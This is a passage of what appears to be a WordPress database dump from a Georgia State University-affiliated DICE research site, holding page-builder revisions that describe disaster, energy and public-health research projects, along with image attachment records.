v-inner-3 style-220 style-local-22-h29 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h30\" class=\"d-block style-221 style-local-22-h30 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h30-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h30-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',22,'https://gsudice.dataconn.net/?p=1436',0,'revision','',0),(1442,1,'2023-09-29 10:29:30','2023-09-29 14:29:30','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:29:30','2023-09-29 14:29:30','',438,'https://gsudice.dataconn.net/?p=1442',0,'revision','',0),(1443,1,'2023-09-29 10:29:30','2023-09-29 14:29:30','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:29:30','2023-09-29 14:29:30','',126,'https://gsudice.dataconn.net/?p=1443',0,'revision','',0),(1448,1,'2023-09-29 10:32:17','2023-09-29 14:32:17','','tornado1','','inherit','open','closed','','tornado1','','','2023-09-29 10:32:17','2023-09-29 14:32:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/tornado1.png',0,'attachment','image/png',0),(1449,1,'2023-09-29 10:32:35','2023-09-29 14:32:35','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado1.png','cropped-tornado1.png','','inherit','open','closed','','cropped-tornado1-png','','','2023-09-29 10:32:35','2023-09-29 14:32:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado1.png',0,'attachment','image/png',0),(1451,1,'2023-09-29 10:34:02','2023-09-29 14:34:02','','tornado','','inherit','open','closed','','tornado','','','2023-09-29 10:34:02','2023-09-29 14:34:02','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/tornado.jpg',0,'attachment','image/jpeg',0),(1452,1,'2023-09-29 10:34:19','2023-09-29 14:34:19','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado.jpg','cropped-tornado.jpg','','inherit','open','closed','','cropped-tornado-jpg','','','2023-09-29 10:34:19','2023-09-29 14:34:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado.jpg',0,'attachment','image/jpeg',0),(1453,1,'2023-09-29 10:35:17','2023-09-29 14:35:17','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-1.jpg','cropped-tornado-1.jpg','','inherit','open','closed','','cropped-tornado-1-jpg','','','2023-09-29 10:35:17','2023-09-29 14:35:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-1.jpg',0,'attachment','image/jpeg',0),(1454,1,'2023-09-29 10:35:40','2023-09-29 14:35:40','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and 